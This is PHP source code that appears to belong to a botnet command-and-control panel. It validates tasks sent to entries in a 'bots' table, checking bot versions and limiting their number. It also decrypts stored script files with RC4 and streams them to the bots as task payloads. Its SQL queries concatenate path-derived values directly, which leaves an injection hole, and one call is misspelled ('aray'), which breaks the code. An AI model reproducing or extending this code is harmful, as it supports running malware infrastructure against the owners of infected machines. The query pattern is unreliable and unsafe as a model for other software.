<?php

function fbc_checkTask($fb, $taskType, &$filePath)
{
    $row = NULL;
    $p_str = $fb->panel->str;
    $taskError = &$fb->panel->str['taskError'];
    
    if( $taskType == 10 )
    {
        $filePath = '';
        $botArray = aray("sel");
        
        $result = select_id_list($fb, "bots", $botArray);
        if( !$result ) 
        { $taskError = taskError(mysqli_error($fb->mysql)); return false; }
        
        $userResult = mysqli_query($fb->mysql,"SELECT * FROM fbc_users");
        if( !$userResult ) 
        { $taskError = taskError(mysqli_error($fb->mysql)); return false; }
        
        if( (mysqli_num_rows($result)+mysqli_num_rows($userResult)) > 5) 
        { $taskError = taskError($p_str['err']['fbc_num_err']); return false; }
        
        while( $row = mysqli_fetch_array($result) )
        {
            if(!isset($row['bv'])) { $taskError = taskError($p_str['err']['fbc_bv_err']); return false; }
            if( $row['bv'] < '3.0' ) 
                { $taskError = taskError($p_str['err']['fbc_bv_err2']." id:".$row['botID']); return false; }
        }
    }
    elseif( $taskType == 11 || $taskType == 12 )
    {
        if( $filePath == '' ) { $taskError = taskError($p_str['err']['fbcfileErr']); return false; }
        
        $pdir = explode('/', $filePath);
        $name = filter_filename($pdir[count($pdir)-1]);
        if(empty($name)){ $taskError = taskError($p_str['err']['fbcfileErr']); return false; }
        
        unset( $pdir[count($pdir)-1] );
        if(!count($pdir)){ $taskError = taskError($p_str['err']['fbcfileErr']); return false; }
        $pdir[0] = $fb->account['name'];
        
        $dir = implode('/', $pdir);
        
        $ext = pathinfo($name, PATHINFO_EXTENSION);
        if(!empty($ext)) { $name = substr( $name,0,strlen($name)-(strlen($ext)+1) ); } else{ $ext = '0';}
        
        $fileResult = mysqli_query($fb->mysql, "SELECT * FROM fbc_files WHERE `file_dir` = '".
            $dir."' AND `file_type` = '2' AND `file_name` = '".$name."' AND `file_ext` = '".$ext."' LIMIT 1;");
        
        if( $fileResult && mysqli_num_rows($fileResult) )
        {
            if( ($row = mysqli_fetch_array($fileResult)) ){
                if( !$row['file_size'] || $row['file_size'] > 1024000 )
                { $taskError = taskError($p_str['err']['sizeErr']); return false; }
            }
        }
        else{ $taskError = taskError($p_str['err']['fbcfileErr']); return false; }    
    }
    
    return true;
}

function fbc_replyTask( $fb, $row)
{
    global $accountName;
    $data = '';
    $url = $row["url"];
    
    if( $row["task"] == 10 )
    {
        $row["task"] = "FBC";
        Log_result($fb, TRUE);
    }
    elseif( $row["task"] == 11 || $row["task"] == 12 )
    {
        $row["task"] -= 10;
        $pdir = explode('/', $url);
                
        $name = filter_filename($pdir[count($pdir)-1]);
        if(empty($name)){ return closeTask($fb, $row["id"]); }
                
        unset( $pdir[count($pdir)-1] );
        if(!count($pdir)){ return closeTask($fb, $row["id"]); }
        $pdir[0] = $accountName;
        
        $dir = implode('/', $pdir);
        $ext = pathinfo($name, PATHINFO_EXTENSION);
        if(!empty($ext)) { $name = substr( $name,0,strlen($name)-(strlen($ext)+1) ); } else{ $ext = '0';}
        
        $fileResult = mysqli_query($fb->mysql, "SELECT * FROM fbc_files WHERE `file_dir` = '".
        $dir."' AND `file_type` = '2' AND `file_name` = '".$name."' AND `file_ext` = '".$ext."' LIMIT 1;");
        
        if( !$fileResult || !mysqli_num_rows($fileResult) )
        {
            return closeTask($fb, $row["id"]);
        }
                
        $url = "script/".$dir."/".$name;
        if( !file_exists($url) || !is_readable($url) ||  filesize($url) > 1024000 )
        { 
            return closeTask($fb, $row["id"]);
        }
                
        if( ($frow = mysqli_fetch_array($fileResult)) )
        {
            $cipher = new Crypt_RC4();
            $pPsw = base64_decode($fb->accountNumber);
            $cipher->setKey($pPsw.$frow["file_created"]);
                    
            $file = fopen($url, 'r');
            $data .= $cipher->decrypt(fread($file, filesize($url)));
        }else { return closeTask($fb, $row["id"]); }
    }
    
    return outputTaskStream($row["task"], $data);
}